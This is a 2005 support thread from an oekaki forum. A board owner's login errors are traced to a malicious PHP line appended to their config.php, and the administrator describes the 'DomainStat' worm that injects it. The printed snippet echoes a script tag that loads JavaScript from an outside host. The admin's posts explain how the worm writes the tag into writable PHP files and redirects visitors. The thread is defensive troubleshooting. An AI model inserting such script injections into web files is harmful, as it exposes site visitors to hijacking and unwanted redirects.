NineChime forum
Furry stuff, oekaki stuff, and other stuff.
You are not logged in.
#1 12-06-2005 03:24:20
- kiwiwolf
- New member
error when logging in
I installed Wax Poteto some time ago. The board was working perfectly fine up until a couple of days ago, but now I am receiving this error when I try to log in:
Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 328
Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 329
Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 33
My board is here: http://oekaki.kiwiwolf.net
Last edited by kiwiwolf (12-06-2005 03:25:30)
Offline
#2 12-06-2005 05:03:55
- Waccoon
- Administrator
Re: error when logging in
Wait... line 30 of config.php? I think this is the same problem Rika is having with her board.
In the documentation folder of your Wacintaki archive, there's a file called "test_php.php". If you could upload that to your server and let me know when it's there, I'll check out your PHP configuration. This isn't a security issue, it just shows me what is supported in your version of PHP.
I have a feeling your sysadmin changed something in the PHP configuration recently.
Offline
#3 12-06-2005 07:04:29
#4 12-08-2005 05:42:55
- Waccoon
- Administrator
Re: error when logging in
Yup, that's it. You may delete that file, BTW, since I didn't see anything unusual.
I know WHAT is causing the problem, but I don't know why. Basicly, PHP is printing something after it parses the config file, and it shouldn't.
If you don't mind, do you think I could have a copy of your config.php file? Send it here.
If at all possible, could you get it from your server with an FTP program in binary mode? If you don't know how to do that, don't worry.
Offline
#6 12-09-2005 04:18:22
- Waccoon
- Administrator
Re: error when logging in
@$*&#%!!!!!!!!!
Here's the problem. This has been added to the end of your config file:
Code:
<? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>[EDIT: Apparently, DomainStat is a worm that hacks into servers through forums, and is not related to the server itself or your web host. I'm looking into fixes and how this thing works.]
Offline
#7 12-10-2005 19:25:00
- Waccoon
- Administrator
Re: error when logging in
Apparently, just changing the config files isn't enough. I've had to make a pacth to disable DomainStats altogether. I've e-mailed it to you, so give it a try (it's just one file). It only disables DomainStat, though. It won't fix it.
Apparently, DomainStat is a new server worm going around. I haven't found out too much about how it works, but it is related to either exploits in forum software, or it does manage to attack an entire server. It uploads the file "insert.php" into a folder on the server, and runs it. Any file accessable to PHP (CHMOD 664 or higher), will then have the DomainStat Javascript tag appended to it. This tag is sent to a member's web browser, where more sophisticated Javascript is downloaded which sets a cookie and redirects to a pop-up or other 3rd party website.
Wacintaki is kind of small on the hacking radar, so I'm thinking this gets into servers via a more popular forum or blogging package. WordPress and Invision Power Board are known to be vulnerable. It's possible that Wacintaki has this vulnerability, though, so if anyone has any info on DomainStat.com, or manages to get a copy of this "insert.php" source code, that would help a lot.
People affected by this issue should ask their web hosts to look for any weird log entry concerning "insert.php". That's the most likely entry point, as this file has to be written to the server before the exploit code can be executed.
Offline